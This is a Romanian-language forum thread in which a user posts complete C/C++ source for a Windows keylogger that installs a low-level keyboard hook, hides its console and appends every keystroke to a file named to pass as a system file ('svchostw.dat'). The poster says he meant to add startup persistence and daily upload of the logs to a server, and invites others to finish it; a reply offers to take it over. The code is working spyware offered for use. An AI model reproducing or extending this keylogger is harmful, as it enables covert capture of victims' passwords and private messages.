[C C++] Keylogger

[Zamolxis666]

Salutare,

Acum ceva timp in urma postase Slick un keylogger care "agata" un hook de tastatura si de fiecare data cand apasai o tasta iti semnala acest lucru printr-o pereche de paranteze afisate in consola.

Am modificat proiectul lui a.i. consola nu mai este afisata, iar tastele apasate sunt inregistrate intr-un fisier. Initial planuisem sa bag programul in registrii sa porneasca automat la startup, iar log-ul sa fie de asemenea urcat automat pe server 1 data /zi. Din pacate, timpul si problemele de acasa m-au facut sa renunt la proiect si il postez aici, in speranta ca cineva il va continua, sau va invata ceva folositor:

#include <windows.h>
#include <winuser.h>
#include <stdio.h>
#include <string.h>

HHOOK hKeyHook; // hook`ul
bool shift = false;
bool caps = false;
FILE *f;

// Acesta functia este exportata din executabil la fel ca o functie care face parte dintr-in dll
__declspec(dllexport) LRESULT CALLBACK KeyEvent(int nCode,WPARAM wParam,LPARAM lParam)
{
	  if((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
	  {
		KBDLLHOOKSTRUCT hooked=*((KBDLLHOOKSTRUCT*)lParam); // diverse informatii despre tasta apasata
		DWORD dwMsg=1;

		if(hooked.vkCode == VK_SHIFT && shift == false)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[SHIFT]");
			fclose(f);
			shift = true;
		}
		else if(hooked.vkCode == VK_SHIFT && shift == true)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[SHIFT]");
			fclose(f);
			shift = false;
		}
		else if(hooked.vkCode == VK_CAPITAL && caps == true)
			caps = false;
		else if(hooked.vkCode == VK_CAPITAL && caps == false)
			caps = true;
		else if((0x41 <= hooked.vkCode && hooked.vkCode <= 0x5A) && (caps || shift))
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%c", hooked.vkCode);
			fclose(f);
		}
		else if((0x41 <= hooked.vkCode && hooked.vkCode <= 0x5A) && (caps==false && shift == false))
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%c", tolower(hooked.vkCode));
			fclose(f);
		}
		else if(VK_NUMPAD0 <= hooked.vkCode && hooked.vkCode <= VK_NUMPAD9)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%d", hooked.vkCode - 0x60);
			fclose(f);
		}
		else if(0x30 <= hooked.vkCode && hooked.vkCode <= 0x39)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%d", hooked.vkCode - 0x30);
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_1)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[;:]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_2)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[/?]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_3)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[`~]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_4)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[ [{ ]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_5)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[\\|]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_6)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[ ]} ]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_7)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "['\"]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_PLUS)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "+");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_COMMA)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", ",");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_MINUS)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "-");
			fclose(f);
		}
		else if(hooked.vkCode == VK_OEM_PERIOD)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", ".");
			fclose(f);
		}
		else if(hooked.vkCode == VK_RETURN)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "\n");
			fclose(f);
		}
		else if(hooked.vkCode == VK_TAB)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[TAB]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_DELETE)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[DEL]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_BACK)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", "[BACK]");
			fclose(f);
		}
		else if(hooked.vkCode == VK_SPACE)
		{
			f = fopen("svchostw.dat", "a");
			fprintf(f, "%s", " ");
			fclose(f);
		}

	  }
	  return CallNextHookEx(hKeyHook,nCode,wParam,lParam);
}

// un ciclu de mesaje folosit ca sa blocheze executia cat timp sunt logate tastele
void MsgLoop()
{
	  MSG message;
	  while(GetMessage(&message,NULL,0,0))
	  {
		TranslateMessage(&message);
		DispatchMessage(&message);
	  }
}

// instaleaza hook`ul si incepe ciclul pentru capturarea tastelor apasate
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
	  HINSTANCE hExe=GetModuleHandle(NULL);
	  if (!hExe) hExe=LoadLibrary((LPCWSTR) lpParameter);
	  if (!hExe) return 1; // eroare, iesim din program
	  hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL,(HOOKPROC) KeyEvent,hExe,0); // instalam hook`ul
	  MsgLoop(); // asteptam apasarea tastelor
	  UnhookWindowsHookEx(hKeyHook); // dezinstalam hook`ul
	  return 0;
}

int main(int argc, char** argv)
{
	  HANDLE hThread;
	  DWORD dwThread;
	  DWORD exThread;

	  hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)KeyLogger, (LPVOID) argv[0], 0, &dwThread); // incepem functia de logging intr-un alt thread
	  if(hThread)
	  {
		return WaitForSingleObject(hThread,INFINITE);
	  }
	  else
	  {
		return 1;
	  }
}

link to pastebin:

[C] KLg - Pastebin.com

Toate cele bune

[UnixDevel]

bun de jucat cu el daca am timp o sa il preiau eu ..